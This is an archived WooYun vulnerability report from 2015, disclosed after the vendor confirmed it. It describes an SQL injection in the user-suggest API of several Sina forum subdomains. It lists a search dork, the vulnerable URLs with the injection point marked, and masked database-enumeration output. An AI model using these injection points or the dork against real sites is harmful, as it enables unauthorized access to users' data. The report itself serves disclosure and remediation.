新浪多站存在通用型SQL注入(涉及大量不同业务类型数据用户数据)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115378

漏洞标题：新浪多站存在通用型SQL注入(涉及大量不同业务类型数据用户数据)

漏洞作者：管管侠

提交时间：2015-05-21 17:26

修复时间：2015-08-20 10:20

公开时间：2015-08-20 10:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-21：细节已通知厂商并且等待厂商处理中
2015-05-22：厂商已经确认，细节仅向厂商公开
2015-05-25：细节向第三方安全合作伙伴开放
2015-07-16：细节向核心白帽子及相关领域专家公开
2015-07-26：细节向普通白帽子公开
2015-08-05：细节向实习白帽子公开
2015-08-20：细节向公众公开

简要描述：

注入

详细说明：

百度：
site:sina.com.cn inurl:club

全部论坛都受影响，自己看每个论坛有多少会员吧，加起来数亿了吧
http://club.baby.sina.com.cn/api/api.php?s=suggest&a=user&q=1
http://club.mil.news.sina.com.cn/api/api.php?s=suggest&a=user&q=1
http://club.eladies.sina.com.cn/api/api.php?s=suggest&a=user&q=1
http://club.news.sina.com.cn/api/api.php?s=suggest&a=user&q=1
http://club.ent.sina.com.cn/api/api.php?s=suggest&a=user&q=1
http://club.astro.sina.com.cn/api/api.php?s=suggest&a=user&q=1
。。。。。。。还有好多

漏洞证明：

http://club.baby.sina.com.cn/api/api.php?s=suggest&a=user&q=1*

Database: clubbaby
[130 tables]

mask 区域

*****------*****
*****diplog*****
*****s     *****
*****ities *****
*****ityapp*****
*****action*****
*****groups*****
*****notes *****
*****sessio*****
*****tiseme*****
*****ncemen*****
*****hments*****
*****hments*****
*****hpayme*****
*****htypes*****
*****roduct*****
*****log   *****
*****d     *****
*****es    *****
*****forums*****
*****s     *****
*****s     *****
*****igns  *****
*****r_queu*****
*****rlogs *****
*****tslog *****
*****      *****
*****eposts*****
*****es    *****
*****dlogin*****
*****      *****
*****ites  *****
*****fields*****
*****links *****
*****recomm*****
*****s     *****
*****types *****
*****es    *****
*****ool   *****
*****log   *****
*****market*****
*****s     *****
*****s     *****
*****rfield*****
*****rmagic*****
*****rs    *****
*****rspace*****
*****ators *****
*****g     *****
*****rks   *****
*****ts    *****
*****eads  *****
*****elist *****
*****etime *****
*****s     *****
*****ntlog *****
*****nhooks*****
*****ns    *****
*****nvars *****
*****      *****
*****rchind*****
*****ptions*****
*****      *****
*****xts   *****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****      *****
*****_1    *****
*****_bak  *****
*****ctforu*****
*****cts   *****
*****lefiel*****
*****cts   *****
*****tions *****
*****      *****
*****      *****
*****og    *****
*****s     *****
*****edthre*****
*****tlog  *****
*****dlog  *****
*****ches  *****
*****h_queu*****
*****hindex*****
*****ons   *****
*****ngs   *****
*****es    *****
*****caches*****
*****      *****
*****ars   *****
*****s     *****
*****vars  *****
*****rums  *****
*****riptio*****
*****      *****
*****ates  *****
*****d_queu*****
*****ds    *****
*****dsmod *****
*****dtags *****
*****dtypes*****
*****commen*****
*****log   *****
*****option*****
*****s     *****
*****      *****
*****odels *****
*****ptions*****
*****ptionv*****
*****ars   *****
*****e     *****
*****ecache*****
*****roups *****
*****ating *****
*****s     *****
*****tags  *****
*****      *****
*****      *****
*****      *****
*****er    *****
*****      *****
*****      *****
*****er    *****
*****------*****

就不继续跑了，后补

修复方案：

版权声明：转载请注明来源管管侠@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-05-22 10:18

厂商回复：

感谢关注新浪安全，漏洞修复中。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115378

漏洞标题：新浪多站存在通用型SQL注入(涉及大量不同业务类型数据用户数据)

相关厂商：新浪

漏洞作者：管管侠

提交时间：2015-05-21 17:26

修复时间：2015-08-20 10:20

公开时间：2015-08-20 10:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源管管侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115378

漏洞标题：新浪多站存在通用型SQL注入(涉及大量不同业务类型数据用户数据)

相关厂商：新浪

漏洞作者： 管管侠

提交时间：2015-05-21 17:26

修复时间：2015-08-20 10:20

公开时间：2015-08-20 10:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0115378"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 管管侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：管管侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源管管侠@乌云